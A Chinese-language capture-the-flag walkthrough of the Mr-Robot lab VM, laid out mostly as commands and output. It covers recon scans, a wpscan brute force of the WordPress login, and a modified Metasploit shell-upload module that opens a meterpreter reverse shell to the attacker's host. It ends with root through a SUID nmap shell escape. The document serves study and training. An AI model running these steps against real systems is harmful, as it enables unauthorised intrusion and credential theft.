[Write-up]Mr-Robot

关于

1. 下载地址
2. 目标：找到3个Key
3. 哔哩哔哩视频。

信息收集

1. 用的是Host-only，所以网卡是vmnet1，IP一直是192.168.7.1/24
2. nmap -T4 192.168.7.1/24 -A

kali-team@LTS:~$ nmap -T4 192.168.7.1/24 -A

Nmap scan report for 192.168.7.129
Host is up (0.00075s latency).
Not shown: 997 filtered ports
PORT    STATE  SERVICE  VERSION
22/tcp  closed ssh
80/tcp  open   http     Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open   ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after:  2025-09-13T10:45:03

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 256 IP addresses (2 hosts up) scanned in 47.44 seconds

kali-team@LTS:~$ curl http://192.168.7.129/robots.txt
User-agent: *
fsocity.dic
key-1-of-3.txt

1. 发现第一个Key【073403c8a58a1f80d943455fb30724b9】，外加一个字典，下载字典到本地。
2. 字典很大，可能有重复的，先优化一下。sort fsocity.dic | uniq > list.dic
3. nikto -h http://192.168.7.129

kali-team@LTS:~/桌面$ nikto -h http://192.168.7.129
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          192.168.7.129
+ Target Hostname:    192.168.7.129
+ Target Port:        80
+ Start Time:         2018-06-19 20:37:10 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache
+ IP address found in the 'x-mod-pagespeed' header. The IP is "1.9.32.3".
+ Uncommon header 'x-frame-options' found, with contents: SAMEORIGIN
+ Uncommon header 'x-mod-pagespeed' found, with contents: 1.9.32.3-4523
+ Retrieved x-powered-by header: PHP/5.5.29
+ Uncommon header 'x-pingback' found, with contents: http://192.168.7.129/xmlrpc.php
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server leaks inodes via ETags, header found with file /robots.txt, fields: 0x29 0x52467010ef8ad
+ "robots.txt" retrieved but it does not contain any 'disallow' entries (which is odd).
+ OSVDB-3092: /admin/: This might be interesting...
+ Uncommon header 'tcn' found, with contents: choice
+ OSVDB-3092: /readme: This might be interesting...
+ Uncommon header 'link' found, with contents: <http://192.168.7.129/?p=23>; rel=shortlink
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /admin/index.html: Admin login page/section found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login/: Admin login page/section found.
+ /wordpress/: A Wordpress installation was found.
+ 6544 items checked: 0 error(s) and 16 item(s) reported on remote host
+ End Time:           2018-06-19 20:39:38 (GMT8) (148 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

1. 通过nikto简单扫描或者用dirsearch扫一下目录

kali-team@LTS:~/桌面$ dirsearch -u http://192.168.7.129 -e * |grep 200
[20:42:35] 301 -  235B  - /admin  ->  http://192.168.7.129/admin/
[20:42:36] 200 -    1KB - /admin/
[20:42:36] 200 -    1KB - /admin/?/login
[20:42:38] 200 -    1KB - /admin/index
[20:42:38] 200 -    1KB - /admin/index.html
[20:42:41] 301 -    0B  - /admin_area/index.php  ->  http://192.168.7.129/admin_area/
[20:43:15] 200 -    0B  - /favicon.ico
[20:43:23] 200 -    1KB - /index.html
[20:43:25] 200 -  504KB - /intro
[20:43:28] 200 -  309B  - /license.txt
[20:43:50] 200 -   64B  - /readme
[20:43:50] 200 -   64B  - /readme.html
[20:43:51] 200 -   41B  - /robots.txt
[20:43:56] 200 -    0B  - /sitemap
[20:43:56] 200 -    0B  - /sitemap.xml
[20:43:56] 200 -    0B  - /sitemap.xml.gz
[20:44:12] 200 -    0B  - /wp-content/
[20:44:12] 200 -    0B  - /wp-content/plugins/google-sitemap-generator/sitemap-core.php
[20:44:12] 200 -    3KB - /wp-login
[20:44:12] 200 -    3KB - /wp-login.php
[20:44:12] 200 -    3KB - /wp-login/

1. 明显是一个WordPress，但是没有看到有用户发文章。打开登录页面枚举用户名，百度Mr.Robot发现黑客军团的主角叫Elliot，现在他提示密码错误了，说明用户名是对的。然后用刚刚发现的字典爆破。
2. wpscan -u http://192.168.7.129 --username Elliot --wordlist list.dic

[+] Enumerating plugins from passive detection ...
[+] No plugins found passively
[+] Starting the password brute forcer
  [+] [SUCCESS] Login : Elliot Password : ER28-0652                                                                                                                                                         

  Brute Forcing 'Elliot' Time: 00:01:21 <=============================================================                                                                > (5637 / 11452) 49.22%  ETA: 00:01:24
  +----+--------+------+-----------+
  | ID | Login  | Name | Password  |
  +----+--------+------+-----------+
  |    | Elliot |      | ER28-0652 |
  +----+--------+------+-----------+

[+] Finished: Tue Jun 19 21:22:23 2018
[+] Elapsed time: 00:01:22
[+] Requests made: 5703
[+] Memory used: 32.516 MB

GetShell

1. 第一种就是以前的登录改主题404模板
2. 第二种要用到Metasploit，看自己喜欢。一个大坑！

msf > use exploit/unix/webapp/wp_admin_shell_upload
msf exploit(unix/webapp/wp_admin_shell_upload) > show options
Module options (exploit/unix/webapp/wp_admin_shell_upload):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   PASSWORD      ER28-0652        yes       The WordPress password to authenticate with
   PAYLOAD_NAME  Kali-Team        yes       Fix By Kali-Team payload_name to update with
   PLUGIN_NAME   WordPress        yes       Fix By Kali-Team plugin_name to update with
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST         192.168.7.129    yes       The target address
   RPORT         80               yes       The target port (TCP)
   SSL           false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI     /                yes       The base path to the wordpress application
   USERNAME      Elliot           yes       The WordPress username to authenticate with
   VHOST                          no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.7.1      yes       The listen address (an interface may be specified)
   LPORT  7788             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   WordPress

msf exploit(unix/webapp/wp_admin_shell_upload) > set password ER28-0652
password => ER28-0652
msf exploit(unix/webapp/wp_admin_shell_upload) > set username Elliot
username => Elliot
msf exploit(unix/webapp/wp_admin_shell_upload) > set rhost 192.168.7.129
rhost => 192.168.7.129

msf exploit(unix/webapp/wp_admin_shell_upload) > run 

[*] Started reverse TCP handler on 192.168.7.1:4444
[-] Exploit aborted due to failure: not-found: The target does not appear to be using WordPress
[*] Exploit completed, but no session was created.

1. 报错了，Google修复，可以上传，但是反弹不会来插件的路径。

   /opt/metasploit-framework/embedded/framework/modules/exploits/unix/webapp/wp_admin_shell_upload.rb

   用#注释掉下面两行

   fail_with(Failure::NotFound, 'The target does not appear to be using WordPress') unless wordpress_and_online?

   fail_with(Failure::UnexpectedReply, 'Failed to upload the payload') unless uploaded

2. 再重新载入模块

msf exploit(unix/webapp/wp_admin_shell_upload) > reload
[*] Reloading module...
msf exploit(unix/webapp/wp_admin_shell_upload) > run 

[*] Started reverse TCP handler on 192.168.7.1:7788
[*] Authenticating with WordPress using Elliot:ER28-0652...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload...
[*] Executing the payload at /wp-content/plugins/WordPress/Kali-Team.php...
[*] Sending stage (37775 bytes) to 192.168.7.129
[*] Meterpreter session 5 opened (192.168.7.1:7788 -> 192.168.7.129:36273) at 2018-06-19 23:13:10 +0800
ls
[!] This exploit may require manual cleanup of 'Kali-Team.php' on the target
[!] This exploit may require manual cleanup of 'WordPress.php' on the target
[!] This exploit may require manual cleanup of '../WordPress' on the target

提权

1. 在robot用户的目录下找到了第二个Key，但是没权限查看。

meterpreter > ls
Listing: /home/robot
====================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100400/r--------  33    fil   2015-11-13 15:28:21 +0800  key-2-of-3.txt
100644/rw-r--r--  39    fil   2015-11-13 15:28:21 +0800  password.raw-md5

meterpreter > cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b

1. 把MD5破解出来，应该就是robot的密码了。
2. 但是su在反弹回来的shell中执行不了。su: must be run from a terminal
3. 转py可以进入交互模式python -c 'import pty;pty.spawn("/bin/bash")'

python -c 'import pty;pty.spawn("/bin/bash")'
daemon@linux:/home/robot$ su robot
su robot
Password: abcdefghijklmnopqrstuvwxyz

robot@linux:~$ id
id
uid=1002(robot) gid=1002(robot) groups=1002(robot)
robot@linux:~$ cat key-2-of-3.txt
cat key-2-of-3.txt
822c73956184f694993bede3eb39f959

1. 第二个Key找到了！
2. 最后提升到root权限，找开启了SUID权限的应用

robot@linux:/$ cd /root
cd /root
bash: cd: /root: Permission denied
robot@linux:/$ find / -perm -4000 -type f 2>/dev/null
find / -perm -4000 -type f 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown
robot@linux:/$

1. 低版本的nmap可以用交互模式，而且上面说的是root权限。！后面接着命令就可以了。

robot@linux:/$ nmap --help
nmap --help
Nmap 3.81 Usage: nmap [Scan Type(s)] [Options] <host or net list>
Some Common Scan Types ('*' options require root privileges)
* -sS TCP SYN stealth port scan (default if privileged (root))
  -sT TCP connect() port scan (default for unprivileged users)
* -sU UDP port scan
  -sP ping scan (Find any reachable machines)
* -sF,-sX,-sN Stealth FIN, Xmas, or Null scan (experts only)
  -sV Version scan probes open ports determining service & app names/versions
  -sR RPC scan (use with other scan types)
Some Common Options (none are required, most can be combined):
* -O Use TCP/IP fingerprinting to guess remote operating system
  -p <range> ports to scan.  Example range: 1-1024,1080,6666,31337
  -F Only scans ports listed in nmap-services
  -v Verbose. Its use is recommended.  Use twice for greater effect.
  -P0 Don't ping hosts (needed to scan www.microsoft.com and others)
* -Ddecoy_host1,decoy2[,...] Hide scan using many decoys
  -6 scans via IPv6 rather than IPv4
  -T <Paranoid|Sneaky|Polite|Normal|Aggressive|Insane> General timing policy
  -n/-R Never do DNS resolution/Always resolve [default: sometimes resolve]
  -oN/-oX/-oG <logfile> Output normal/XML/grepable scan logs to <logfile>
  -iL <inputfile> Get targets from file; Use '-' for stdin
* -S <your_IP>/-e <devicename> Specify source address or network interface
  --interactive Go into interactive mode (then press h for help)
Example: nmap -v -sS -O www.my.com 192.168.0.0/16 '192.88-90.*.*'
SEE THE MAN PAGE FOR MANY MORE OPTIONS, DESCRIPTIONS, AND EXAMPLES
robot@linux:/$
robot@linux:/$ nmap --interactive
nmap --interactive
Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help

---

nmap> !id
!id
uid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot)
waiting to reap child : No child processes
nmap>
Unknown command (ls) -- press h <enter> for help
nmap/> !ls
!ls
bin   dev  home        lib    lost+found  mnt  proc  run   srv	tmp  var
boot  etc  initrd.img  lib64  media	  opt  root  sbin  sys	usr  vmlinuz
waiting to reap child : No child processes
nmap> !ls /root
!ls /root
firstboot_done	key-3-of-3.txt
waiting to reap child : No child processes
nmap> cat /root/key-3-of-3.txt
cat /root/key-3-of-3.txt
Unknown command (cat) -- press h <enter> for help
nmap> !cat /root/key-3-of-3.txt
!cat /root/key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4
waiting to reap child : No child processes
nmap>

彩蛋

1. 其实账号密码别人已经给你了http://192.168.7.129/license.txt
2. 拿到ZWxsaW90OkVSMjgtMDY1Mgo=
3. base64解一下echo ZWxsaW90OkVSMjgtMDY1Mgo= |base64 --decode
4. elliot:ER28-0652